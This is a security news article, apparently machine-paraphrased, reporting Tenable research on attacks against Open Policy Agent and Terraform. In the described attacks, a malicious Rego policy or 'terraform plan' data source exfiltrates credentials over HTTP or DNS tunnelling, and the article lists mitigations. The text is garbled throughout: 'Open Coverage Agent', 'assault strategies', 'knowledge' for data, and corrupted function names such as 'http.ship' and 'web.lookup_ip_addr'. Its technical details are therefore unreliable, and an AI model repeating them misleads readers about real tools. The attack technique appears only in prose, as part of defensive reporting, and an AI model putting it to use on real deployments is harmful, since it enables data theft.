Cybersecurity researchers have disclosed two new assault strategies towards infrastructure-as-code (IaC) and policy-as-code (PaC) instruments like HashiCorp’s Terraform and Open Coverage Agent (OPA) that leverage devoted, domain-specific languages (DSLs) to breach cloud platforms and exfiltrate knowledge.
“Since these are hardened languages with restricted capabilities, they’re alleged to be safer than normal programming languages – and certainly they’re,” Tenable senior safety researcher Shelly Raban stated in a technical report printed final week. “Nevertheless, safer doesn’t imply bulletproof.”
OPA is a well-liked, open-source coverage engine that enables organizations to implement insurance policies throughout cloud-native environments, corresponding to microservices, CI/CD pipelines, and Kubernetes. Insurance policies are outlined utilizing a local question language known as Rego which is then evaluated by OPA to return a call.
The assault technique devised by Tenable targets the provision chain, whereby an attacker features unauthorized entry by a compromised entry key to insert a malicious Rego coverage to an OPA server, which is subsequently used throughout the coverage determination section to permit malicious actions like credential exfiltration utilizing a built-in operate often called “http.ship.”
Even in situations the place an OPA deployment restricts using http.ship, the cybersecurity agency discovered that it is potential to make the most of one other operate named “web.lookup_ip_addr” to smuggle the information utilizing DNS lookups through a way known as DNS tunneling.
“So, the web.lookup_ip_addr operate is one other operate you would possibly take into account proscribing or at the least searching for in insurance policies, because it additionally introduces the danger of information exfiltration out of your OPA deployment,” Raban stated.
Terraform, just like OPA, goals to simplify the method of establishing, deploying, and managing cloud assets by code-based definitions. These configurations will be arrange utilizing one other declarative DSL known as HashiCorp Configuration Language (HCL).
An attacker may goal the open-source IaC platform by making the most of its “terraform plan” command, that are sometimes triggered as a part of GitHub “pull_request” workflows, to execute unreviewed adjustments containing a malicious knowledge supply throughout the CI/CD course of.
“This poses a threat, as an exterior attacker in a public repository or a malicious insider (or an exterior attacker with a foothold) in a personal repository may exploit a pull request for his or her malicious targets,” Tenable famous. “Information sources run throughout ‘terraform plan,’ which considerably lowers the entry level for attackers.”
These knowledge sources, in flip, may very well be a rogue exterior knowledge supply, a Terraform module, or a DNS knowledge supply, necessitating that solely third-party elements from trusted sources be used. A few of the different suggestions to mitigate such dangers embody –
- Implement a granular role-based entry management (RBAC) and comply with the precept of least privilege
- Arrange application-level and cloud-level logging for monitoring and evaluation
- Restrict the community and knowledge entry of the functions and the underlying machines
- Forestall automated execution of unreviewed and doubtlessly malicious code in CI/CD pipelines
Moreover, organizations can use IaC scanning instruments and options like Terrascan and Checkov to preemptively establish misconfigurations and compliance points previous to deployment.
